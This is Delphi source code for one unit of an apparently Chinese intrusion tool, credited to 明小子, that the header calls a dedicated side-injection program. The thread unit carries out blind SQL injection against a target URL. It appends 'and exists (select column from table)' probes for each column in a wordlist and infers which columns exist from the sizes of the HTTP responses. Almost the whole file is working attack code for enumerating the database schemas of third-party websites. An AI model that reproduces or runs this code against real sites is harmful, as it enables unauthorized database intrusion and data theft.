scanfield.pas

明小子旁注Domain3.0和Domain2.2两个版本源码

{##########################################
         旁注入侵专用程序 3.0升级版
 ----------------------------------------
  模块：SQL注入检测 - 检测列名
  描述：该单元为检测列名的线程单元
  作者：2005.3.20日下午  明小子
##########################################}

unit ScanField;

interface

uses
  Classes, GetHttpSize, SysUtils, StdCtrls, CheckLst;

type
  MyScanField = class(TThread)
  private
    SqlURL: TComboBox;
    SqlTableName: string;
    SqlLog, SqlResultMem: TMemo;
    SqlChkField: TCheckListBox;
    and1, and2, SqlDataType, ifor: integer;
    AddFieldLst: TListBox;
    procedure ShowStr;
  protected
    procedure Execute; override;
  public
    constructor Create(Url: TComboBox; TableName: string; Log, SqlResult: TMemo; ChkField: TCheckListBox; FieldLst: TListBox);
  end;

implementation

uses MainUnit;

constructor MyScanField.Create(Url: TComboBox; TableName: string; Log, SqlResult: TMemo; ChkField: TCheckListBox; FieldLst: TListBox);
begin
  SqlURL := Url;
  SqlTableName := TableName;
  SqlLog := Log;
  SqlResultMem := SqlResult;
  SqlChkField := ChkField;
  AddFieldLst := FieldLst;
  FreeonTerminate := True;
  inherited Create(False);
end;

procedure MyScanField.ShowStr;
begin
  MainForm.Gauge1.Progress := ifor;
  SqlLog.Lines.Add(SqlURL.text + ' and exists (select ' + SqlChkField.Items[ifor] + ' from ' + SqlTableName + ')');
  and2 := Get_HttpSize(SqlURL.text + '%20and%20exists%20(select%20' + SqlChkField.Items[ifor] + '%20from%20' + SqlTableName + ')', 100);
  if and2 >= and1 then
  begin
    AddFieldLst.Items.Add(SqlChkField.Items[ifor]);
    MainForm.RzGroupBox7.Caption := '列名:' + inttostr(AddFieldLst.Items.Count) + '个';
    AddFieldLst.Refresh;
  end;
end;

procedure MyScanField.Execute;
var
  i: integer;
begin
  and1 := MainForm.and1Num;
  for i := 0 to SqlChkField.Items.Count - 1 do
  begin
    if Terminated then Exit;
    if SqlChkField.Checked[i] then
    begin
      ifor := i;
      Synchronize(ShowStr);
    end;
    sleep(20);
  end;
end;

end.